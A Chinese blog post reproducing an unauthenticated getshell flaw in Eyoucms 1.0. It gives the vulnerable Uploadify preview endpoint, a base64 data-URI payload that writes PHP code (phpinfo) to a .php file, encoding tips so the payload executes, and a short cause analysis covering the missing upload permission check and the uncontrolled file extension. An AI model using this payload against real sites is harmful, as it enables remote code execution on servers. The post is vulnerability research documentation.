Eyoucms 1.0 前台getshell复现

分享 77 字 大概 1 分钟 598 次

0.png

复现环境

  • php5.6
  • Eyoucms 1.0

复现过程

利用地址:http://192.168.2.1/index.php/api/Uploadify/preview

1.png

先将 <?php phpinfo(); base64编码

2.png

data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

Tips:部分在线编码会编码成 Jmx0Oz9waHAgcGhwaW5mbygpOw==,这样生成的文件中 < 会被转义,变成 &lt;?php phpinfo();,导致无法执行。

3.png

地址:
http://192.168.2.1/preview/3595ba653cb9453a3ba63aa47152b40f.php
4.png

漏洞分析

涉及文件:\application\api\controller\Uploadify.php

5.png

  1. 没有上传图片权限限制
  2. 上传图片后缀可控无限制
文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想